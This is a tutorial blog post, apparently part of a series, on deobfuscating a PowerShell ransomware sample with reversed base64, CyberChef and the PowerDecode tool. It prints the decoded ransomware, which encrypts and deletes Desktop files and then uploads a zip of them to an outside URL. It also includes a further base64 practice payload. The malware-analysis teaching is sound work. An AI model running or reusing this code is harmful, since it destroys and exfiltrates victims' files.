How to analyze powershell obfuscated code, Part-3
In this part we will analyze the same obfuscated powershell code in another way. Here is the 1st and 2nd part:
Open powershell ISE in admin mode. Navigate to File > Open. Then select this encoded_ps.ps1 script.
Now if we execute the script at this point, then the script will completely execute and ransomware will encrypt all the files. In order to prevent that we need to remove this pieces of code |${;}”|&${;}; but we will keep the ” quote which is present before the pipe sign. Below screenshot will clarify more. We are removing these pieces of code because & sign is used. & sign is used to tell powershell that execute everything (actually it is invoking expression).
Now the end point of our script will look like this after removing those pieces of code. Now click the green play button. Then you will get the following another layer of obfuscated code.
iex means invoke-expression which is used to execute powershell command or script.
If we do not remove those pieces of code then code will look like this. See below:
Notice the iex at the end. This iex would then execute this 2nd layer obfuscated code in the memory.
PS C:\Windows\system32> Get-Variable
Name Value
---- -----
" [CHar]
$ ${;}
& 8
( 6
) 7
. 3
; iex
? True
@ 2
[ 4
] 5
^ ${;}
| 9
+ 1
= 0
args {}
ConfirmPreference High
ConsoleFileName
DebugPreference SilentlyContinue
Error {}
ErrorActionPreference Continue
ErrorView NormalView
ExecutionContext System.Management.Automation.EngineIntrinsics
false False
FormatEnumerationLimit 4
HOME C:\Users\Avi_Mahim
Host System.Management.Automation.Internal.Host.InternalHost
input System.Collections.ArrayList+ArrayListEnumeratorSimple
MaximumAliasCount 4096
MaximumDriveCount 4096
MaximumErrorCount 256
MaximumFunctionCount 4096
MaximumHistoryCount 4096
MaximumVariableCount 4096
MyInvocation System.Management.Automation.InvocationInfo
NestedPromptLevel 0
null
OutputEncoding System.Text.SBCSCodePageEncoding
PID 3280
profile C:\Users\Avi_Mahim\Documents\WindowsPowerShell\Microsoft.PowerShellISE_profile.ps1
ProgressPreference Continue
PSBoundParameters {}
PSCommandPath
PSCulture en-US
PSDefaultParameterValues {}
PSEmailServer
PSHOME C:\Windows\System32\WindowsPowerShell\v1.0
psISE Microsoft.PowerShell.Host.ISE.ObjectModelRoot
PSScriptRoot
PSSessionApplicationName wsman
PSSessionConfigurationName http://schemas.microsoft.com/powershell/Microsoft.PowerShell
PSSessionOption System.Management.Automation.Remoting.PSSessionOption
PSUICulture en-US
psUnsupportedConsoleApplica... {wmic, wmic.exe, cmd, cmd.exe...}
PSVersionTable {PSVersion, WSManStackVersion, SerializationVersion, CLRVersion...}
PWD C:\Windows\system32
ShellId Microsoft.PowerShell
StackTrace
true True
VerbosePreference SilentlyContinue
WarningPreference Continue
WhatIfPreference False
PS C:\Windows\system32>
We can see some variables.
Now we have saved the new layer of obfuscated code to char.txt file in desktop. Then we save again the char.txt as char.ps1
Then we open the char.ps1 file in the same way in powershell ise and assign a variable $x
Once it is executed in memory, we redirected the output into a charoutput.txt file in desktop.
$9HvtMFbC2RGJX6YOASjNeBx = "=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" ; $OaET = $9HvtMFbC2RGJX6YOASjNeBx.ToCharArray() ; [array]::Reverse($OaET) ; -join $OaET 2>&1> $null ; $biPIv9ahScgYwGXl0FyV = [SySteM.tExt.EnCOding]::uTf8.GetStRIng([SySTEm.COnVerT]::FrombASe64StRINg("$OaET")) ; $ehyGknDcqxFwCYJz5vfot4T8 = "iN"+"vo"+"Ke"+"-e"+"xP"+"RE"+"ss"+"Io"+"n" ; neW-aLIAs -NAme PwN -VAlUE $ehyGknDcqxFwCYJz5vfot4T8 -forCE ; pWN $biPIv9ahScgYwGXl0FyV ;
Then we get this base64 reverse code (= sign at the first tell us the code is in reverse order) and some other little bit readable code. Using cyberchef first we reverse the base64 code using Reverse recipe and then decode using base64 recipe. Then we got the following.
The same encryption function that we seen in our part 1.
function encryptFiles{
Param(
[Parameter(Mandatory=${true}, position=0)]
[string] $baseDirectory
)
foreach($File in (Get-ChildItem $baseDirectory -Recurse -File)){
if ($File.extension -ne ".enc"){
$DestinationFile = $File.FullName + ".enc"
$FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open)
$FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create)
$cipher = [System.Security.Cryptography.SymmetricAlgorithm]::Create("AES")
$cipher.key = [System.Text.Encoding]::UTF8.GetBytes("7h3_k3y_70_unl0ck_4ll_7h3_f1l35!")
$cipher.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$cipher.GenerateIV()
$FileStreamWriter.Write([System.BitConverter]::GetBytes($cipher.IV.Length), 0, 4)
$FileStreamWriter.Write($cipher.IV, 0, $cipher.IV.Length)
$Transform = $cipher.CreateEncryptor()
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
$FileStreamReader.CopyTo($CryptoStream)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
Remove-Item -LiteralPath $File.FullName
}
}
}
$flag = "flag{892a8921517dcecf90685d478aedf5e2}"
$ErrorActionPreference= 'silentlycontinue'
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split("\")[-1]
encryptFiles("C:\Users\"+$user+"\Desktop")
Add-Type -assembly "system.io.compression.filesystem"
[io.compression.zipfile]::CreateFromDirectory("C:\Users\"+$user+"\Desktop", "C:\Users\"+$user+"\Downloads\Desktop.zip")
$zipFileBytes = Get-Content -Path ("C:\Users\"+$user+"\Downloads\Desktop.zip") -Raw -Encoding Byte
$zipFileData = [Convert]::ToBase64String($zipFileBytes)
$body = ConvertTo-Json -InputObject @{file=$zipFileData}
Invoke-Webrequest -Method Post -Uri "https://www.thepowershellhacker.com/exfiltration" -Body $body
Remove-Item -LiteralPath ("C:\Users\"+$user+"\Downloads\Desktop.zip")
Now this is one way to find out the encryption function. There is another way. We can use powerdecode powershell tool to uncover the obfuscation layer.
From the above link you can download the tool.
Now open powershell in admin mode and give command Set-ExecutionPolicy Bypass
Now execute the script by giving .\GUI.ps1 command.
Now you need to provide the script that you want to decode or deobfuscate. Now it will ask you what would be your destination folder where this tool will save the decoded script. Please provide that folder. Then it will start removing obfuscation layer.
From the 1st layer obfuscation we get another layer obfuscated code. But i saw that the tool failed to decode the 2nd layer. Which i manually did using cyberchef. Please check part-1 writeup.
But thankfully this code successfully decode this part.
The main thing is, you need to have knowledge how to do it manually, then the rest will do this tool.
For your practice I am giving you another code. This tool will help you to decode this as well.
cwBlAHQALQBWAGEAcgBpAGEAYgBMAGUAIAAgADMAOABiAEoAIAAgACgAIABbAFQAeQBQAGUAXQAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBHACcALAAnAG4AJwAsACcAbwBkAGkAJwAsACcAdABFAFgAVAAuAGUATgBjACcAKQAgACAAKQA7ACQAewBIAGAAUwB0AH0AIAA9ACAAKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwAuADEAMAAwAC4AMgAzACcALAAnADMALgAyADAAJwAsACcAMQAnACwAJwAxADgANQAnACkAOwANAAoAJAB7AFAAYABSAHQAfQAgAD0AIAA4ADAAOwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFcAYQB0AGMASABgAEUAcgAoACkAIAB7ADsADQAKACAAIAAgACAAJAB7AEwAYABJAE0AaQBUAH0AIAA9ACAAKAAuACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAEcAZQB0ACcALAAnAGEAbgBkAG8AbQAnACwAJwAtAFIAJwApACAALQBNAGkAbgBpAG0AdQBtACAAMwAgAC0ATQBhAHgAaQBtAHUAbQAgADcAKQA7AA0ACgAgACAAIAAgACQAewBzAFQAbwBQAGAAVwBhAFQAYABjAEgAfQAgAD0AIAAmACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACcAagBlAGMAdAAnACwAJwBOAGUAdwAtAE8AJwAsACcAYgAnACkAIAAtAFQAeQBwAGUATgBhAG0AZQAgACgAIgB7ADYAfQB7ADUAfQB7ADcAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADIAfQB7ADMAfQAiAC0AZgAnAHAAJwAsACcAdAAnACwAJwB3AGEAJwAsACcAdABjAGgAJwAsACcAbwAnACwAJwB5AHMAJwAsACcAUwAnACwAJwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFMAJwApADsADQAKACAAIAAgACAAJAB7AHQAaQBgAE0AZQBTAHAAYABBAE4AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAZQBTAHAAYQBuACcALAAnAC0AVABpAG0AJwAsACcAZQB3ACcALAAnAE4AJwApACAALQBTAGUAYwBvAG4AZABzACAAJAB7AEwASQBgAE0AYABpAFQAfQA7AA0ACgAgACAAIAAgACQAewBzAHQAYABPAHAAVwBgAEEAVABDAEgAfQAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAdABhACcALAAnAHIAdAAnACkALgBJAG4AdgBvAGsAZQAoACkAOwANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAoACgAJAB7AFMAYABUAGAATwBwAFcAYQBUAGMASAB9AC4AIgBlAEwAQQBwAGAAcwBgAEUAZAAiACkALgAiAHQATwBgAFQAYABBAEwAcwBlAGAAYwBvAE4AZABTACIAIAAtAGwAdAAgACQAewBUAEkAbQBlAGAAcwBgAFAAYQBuAH0ALgAiAHQATwBgAFQAQQBMAHMAZQBjAG8AbgBgAGQAcwAiACkAIAApACAAewB9ADsADQAKACAAIAAgACAAJAB7AFMAdABgAE8AUAB3AGEAYABUAGMASAB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFMAdAAnACwAJwBvAHAAJwApAC4ASQBuAHYAbwBrAGUAKAApADsADQAKAH0AOwANAAoADQAKACYAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwB3AGEAdABjACcALAAnAGgAZQByACcAKQA7AA0ACgAkAHsAYQBgAFIAUgB9ACAAPQAgACYAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcATgAnACwAJwBlAHcALQBPAGIAagBlACcALAAnAGMAdAAnACkAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHQAWwBdACcALAAnAGkAbgAnACkAIAA1ADAAMAA7AA0ACgBmAG8AcgAgACgAJAB7AGkAfQAgAD0AIAAwADsAIAAkAHsASQB9ACAALQBsAHQAIAA5ADkAOwAgACQAewBpAH0AKwArACkAIAB7ADsADQAKACAAIAAgACAAJAB7AGEAYABSAHIAfQBbACQAewBpAH0AXQAgAD0AIAAoACYAKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAEcAZQB0AC0AJwAsACcAbwBtACcALAAnAGQAJwAsACcAUgBhAG4AJwApACAALQBNAGkAbgBpAG0AdQBtACAAMQAgAC0ATQBhAHgAaQBtAHUAbQAgADIANQApADsADQAKAH0AOwANAAoADQAKAGkAZgAoACQAewBhAGAAUgBSAH0AWwAwAF0AIAAtAGcAdAAgADAAKQAgAHsAOwANAAoAIAAgACAAIAAkAHsAVgBBAEwAYABrAGAAcwBEAGgAZgBnAH0AIAA9ACAALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBOAGUAdwAtAE8AYgAnACwAJwBqAGUAJwApACAAKAAiAHsANgB9AHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9AHsANQB9AHsANwB9AHsAOAB9AHsANAB9ACIALQBmACAAJwBtACcALAAnAC4AVABDAFAAJwAsACcALgBOAGUAdAAuAFMAbwBjAGsAJwAsACcAZQB0AHMAJwAsACcAdAAnACwAJwBDACcALAAnAFMAeQBzAHQAZQAnACwAJwBsAGkAZQAnACwAJwBuACcAKQAoACQAewBIAGAAcwB0AH0ALAAkAHsAUABgAFIAdAB9ACkAOwANAAoAIAAgACAAIAAkAHsAYgBhAG4ATABKAGAAUwBgAEQARgBuAH0AIAA9ACAAJAB7AFYAQQBgAEwAYABLAFMAZABgAEgAZgBnAH0ALgAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARwAnACwAJwBlAHQAUwB0AHIAZQAnACwAJwBhAG0AJwApAC4ASQBuAHYAbwBrAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACQAewBiAGAAeQBUAGAARQBzAH0AIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJgAoACcAJQAnACkAewAwAH0AOwANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAoACQAewBJAH0AIAA9ACAAJAB7AEIAQQBOAGAAbABqAHMAZABgAEYATgB9AC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZAAnACwAJwBSAGUAYQAnACkALgBJAG4AdgBvAGsAZQAoACQAewBiAGAAeQB0AEUAcwB9ACwAIAAwACwAIAAkAHsAQgBgAFkAdABlAFMAfQAuACIATABlAE4AYABHAHQAaAAiACkAKQAgAC0AbgBlACAAMAApAHsAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBMAEsAYABKAG4AcwBEAEYAYABGAEEAYQB9ACAAPQAgACgALgAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAJwBOAGUAdwAtAE8AJwAsACcAYgBqAGUAYwAnACwAJwB0ACcAKQAgAC0AVAB5AHAAZQBOAGEAbQBlACAAKAAiAHsANQB9AHsAMAB9AHsANgB9AHsAMwB9AHsANAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBzAHQAJwAsACcAYwBvAGQAaQBuAGcAJwAsACcARQBuACcALAAnAFQAZQB4AHQAJwAsACcALgBBAFMAQwBJAEkAJwAsACcAUwB5ACcALAAnAGUAbQAuACcAKQApAC4AIgBnAGAARQB0AHMAYABUAFIASQBuAGcAIgAoACQAewBCAHkAVABgAGUAUwB9ACwAMAAsACAAJAB7AEkAfQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsATgBgAHMARABGAEcAcwBgAEEAaABqAHgAWAB9ACAAPQAgACgAJgAoACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAbQAnACwAJwBnAGMAJwApACgAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwAqACcALAAnAC0AZQB4AHAAKgAnACwAJwBrAGUAJwApACkAKQAgACQAewBsAGsASgBgAE4AcwBgAGQARgBgAEYAQQBBAH0AIAAyAD4AJgAxACAAfAAgAC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAbgBnACcALAAnAE8AdQB0AC0AUwB0ACcALAAnAHIAaQAnACkAIAApADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsATgBzAEQAYABGAGAARwBzAGEASABgAEoAWAB4ADIAfQAgAD0AIAAkAHsAbgBTAEQAZgBgAGcAUwBBAEgAYABqAHgAWAB9ACAAKwAgACgAJgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHAAJwAsACcAdwBkACcAKQApAC4AIgBQAGAAQQBUAEgAIgAgACsAIAAiAD4AIAAiADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAcwBlAGAATgBEAEIAYABZAFQAZQB9ACAAPQAgACgAIAAkAHsAMwA4AGAAQgBqAH0AOgA6ACIAYQBzAGAAYwBpAEkAIgApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAeQB0AGUAcwAnACwAJwBHAGUAdABCACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AG4AcwBEAGYAZwBgAHMAYQBIAGAASgB4AFgAMgB9ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBiAGEAYABOAEwAYABqAGAAUwBEAEYATgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBXACcALAAnAHIAaQB0AGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAcwBlAE4AYABEAEIAeQBgAFQARQB9ACwAMAAsACQAewBTAEUATgBgAGQAYABCAHkAYABUAGUAfQAuACIATABgAEUATgBHAGAAVABoACIAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJAB7AGIAQQBOAGAATABgAEoAUwBkAEYATgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEYAbAAnACwAJwB1AHMAaAAnACkALgBJAG4AdgBvAGsAZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACYAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwB3ACcALAAnAHIAJwAsACcAYQB0AGMAaABlACcAKQB9ADsADQAKACAAIAAgACAAJAB7AHYAYQBgAEwAawBzAGAAZABIAEYAZwB9AC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQAnACwAJwBDAGwAbwBzACcAKQAuAEkAbgB2AG8AawBlACgAKQA7AA0ACgANAAoAfQA7AA==
Process:
1. Decode the code using cyberchef. (Use from base64 and remove null bytes recipe)
2. Take the output and save in a text file.
3. Then follow powerdecode decoding process.
Thanks. I hope you learn something new from here.
Please Subscribe below.
LinkedIn:
https://www.linkedin.com/in/md-mahimbin-firoj-7b8a5a113/
YouTube: